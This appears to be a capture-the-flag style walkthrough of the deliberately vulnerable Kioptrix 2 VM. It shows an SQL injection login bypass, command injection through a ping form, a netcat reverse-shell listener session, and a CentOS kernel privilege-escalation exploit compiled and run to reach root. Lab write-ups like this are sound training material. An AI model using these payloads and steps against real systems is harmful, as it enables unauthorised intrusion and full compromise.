Checkout SlayerLabs.com!
Networks Engineered to Exploit.
- Windows/UNIX - Domains/Subnets - Initial/Post/Lateral - Low Cost VPN Ranges -
Kioptrix 2
Our initial scan shows a few ports open, but we will focus on the web app.
80/tcp open http Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
We are initally confronted with a login page. Running dirb and gobuster we only come up with a few default apache directories with nothing special in the /cgi-bin directory. Now to move on and test for default credentials, source code and tamper data to see if anything peaks out interest, which turns out to be nothing.
Throwing a few random bad SQL characters also doesn’t trigger anything juicy, until we try ‘or 1=1 – in BOTH the username and password fields.
Now we see a ping tool app, which triggers the thought of possible command execution. Trying ** | uname -a** works immediately. |
Since we have command execution we can try to execute a one-liner reverse shell. Python and netcat didn’y seem to work, but the basic linux bash reverse shell worked without a problem.
root@kali:/var/www/html# nc -lvp 4444
listening on [any] 4444 ...
192.168.72.136: inverse host lookup failed: Unknown host
connect to [192.168.72.128] from (UNKNOWN) [192.168.72.136] 32780
bash: no job control in this shell
bash-3.00$ whoami
apache
PrivEsc
Doing some quick enumeration on our known CentOS box, we get our kernal and version details.
bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux
bash-3.00$ cat /etc/redhat-release
CentOS release 4.5 (Final)
CetOS 4.5 is pretty old, so a quick kernal check using our precious searchsploit throws us a solid candidate.
root@kali:/usr/share/exploitdb/platforms# searchsploit centos 4.5
----------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
----------------------------------------------------------------------- ----------------------------------
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core | lin_x86/local/9542.c
Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Privilege Escalatio | linux/local/35370.c
----------------------------------------------------------------------- ----------------------------------
After digging into the Ring0 exploit, the victims kernal and OS match the vulnerability. We’ll copy the exploit to our webroot and wget from our victims low priv shell.
Once the file transfer is successful, we’ll chmod, compile and execute.
bash-3.00$ gcc 9542.c -o ook
bash-3.00$ chmod 777 ook
bash-3.00$ ./ook
sh: no job control in this shell
sh-3.00# uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux
sh-3.00# whoami
root
sh-3.00# cd /root
Perfect, we have root shell.